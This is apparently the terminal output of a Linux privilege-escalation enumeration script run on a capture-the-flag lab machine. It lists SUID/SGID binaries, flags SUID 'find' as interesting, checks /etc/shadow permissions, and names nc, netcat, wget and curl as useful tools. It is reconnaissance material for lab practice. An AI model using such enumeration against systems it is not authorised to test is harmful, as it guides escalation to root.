1107 [00;31m[-] /etc/init.d/ binary permissions: [00m1108 total 2801109 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .1110 drwxr-xr-x 85 root root 4096 May 7 01:08 ..1111 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot1112 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start1113 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop1114 -rw-r--r-- 1 root root 2427 Oct 16 2012 README1115 -rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid1116 -rwxr-xr-x 1 root root 7820 May 26 2018 apache21117 -rwxr-xr-x 1 root root 1071 Jun 25 2011 atd1118 -rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs1119 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh1120 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh1121 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh1122 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh1123 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup1124 -rwxr-xr-x 1 root root 3033 Jul 3 2012 cron1125 -rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus1126 -rwxr-xr-x 1 root root 6435 Feb 11 2018 exim41127 -rwxr-xr-x 1 root root 1329 Oct 16 2012 halt1128 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh1129 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh1130 -rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd1131 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup1132 -rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs1133 -rwxr-xr-x 1 root root 1990 May 21 2012 kmod1134 -rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans1135 -rwxr-xr-x 1 root root 995 Oct 16 2012 motd1136 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh1137 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh1138 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh1139 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh1140 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh1141 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh1142 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh1143 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql1144 -rwxr-xr-x 1 root root 4322 Mar 
14 2013 networking1145 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common1146 -rwxr-xr-x 1 root root 1346 May 20 2012 procps1147 -rwxr-xr-x 1 root root 6120 Oct 16 2012 rc1148 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local1149 -rwxr-xr-x 1 root root 117 Oct 16 2012 rcS1150 -rwxr-xr-x 1 root root 639 Oct 16 2012 reboot1151 -rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond1152 -rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin1153 -rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind1154 -rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog1155 -rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs1156 -rwxr-xr-x 1 root root 590 Oct 16 2012 single1157 -rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton1158 -rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh1159 -rwxr-xr-x 1 root root 8827 Nov 9 2012 udev1160 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab1161 -rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs1162 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh1163 -rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot1164 -rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom1165 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils1166 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common1167
1168
1169 [00;31m[-] /etc/init/ config file permissions: [00m1170 total 481171 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .1172 drwxr-xr-x 85 root root 4096 May 7 01:08 ..1173 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf1174 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf1175 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf1176 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf1177 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf1178 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf1179 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf1180 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf1181 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf1182 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf1183
1184
1185 [00;31m[-] /lib/systemd/* config file permissions: [00m1186 /lib/systemd/:1187 total 4.0K1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system1189
1190 /lib/systemd/system:1191 total 56K1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants1196 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service1197 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket1198 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service1199 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket1200 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket1201 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service1202 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service1203 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service1204 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service1205 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket1206
1207 /lib/systemd/system/dbus.target.wants:1208 total 01209 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket1210
1211 /lib/systemd/system/multi-user.target.wants:1212 total 01213 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service1214
1215 /lib/systemd/system/sockets.target.wants:1216 total 01217 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket1218 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket1219 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket1220
1221 /lib/systemd/system/basic.target.wants:1222 total 01223 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service1224 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service1225
1226
1227 [00;33m### SOFTWARE ############################################# [00m1228 [00;31m[-] MYSQL version: [00m1229 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.21230
1231
1232 [00;31m[-] Apache user configuration: [00m1233 APACHE_RUN_USER=www-data1234 APACHE_RUN_GROUP=www-data1235
1236
1237 [00;33m### INTERESTING FILES #################################### [00m1238 [00;31m[-] Useful file locations: [00m1239 /bin/nc1240 /bin/netcat1241 /usr/bin/wget1242 /usr/bin/gcc1243 /usr/bin/curl1244
1245
1246 [00;31m[-] Installed compilers: [00m1247 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler1248 ii gcc 4:4.7.2-1 i386 GNU C compiler1249 ii gcc-4.7 4.7.2-5 i386 GNU C compiler1250 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)1251 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files)1252
1253
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
1260
[-] SUID files:
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs
1282
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
1286
1287 [00;31m[-] SGID files: [00m1288 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent1289 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate1291 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile1292 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage1293 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write1294 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock1295 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall1296 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab1297 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry1298 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail1299 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile1300 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter1301 -rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd1302
1303
[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered
1312 [00;31m[-] All *.conf files in /etc (recursive 1 level): [00m1313 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf1314 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf1315 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf1316 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf1317 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf1318 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf1320 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf1321 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf1323 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf1324 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf1325 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf1326 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf1327 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf1328 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf1329 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf1330 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf1331 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf1333 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf1334 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf1336 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf1337
1338
[-] Location and contents (if accessible) of .bash_history file(s):
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit
1347
1348 [00;31m[-] Any interesting mail in /var/mail: [00m1349 total 81350 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..1352
1353
1354 [00;33m### SCAN COMPLETE #################################### [00m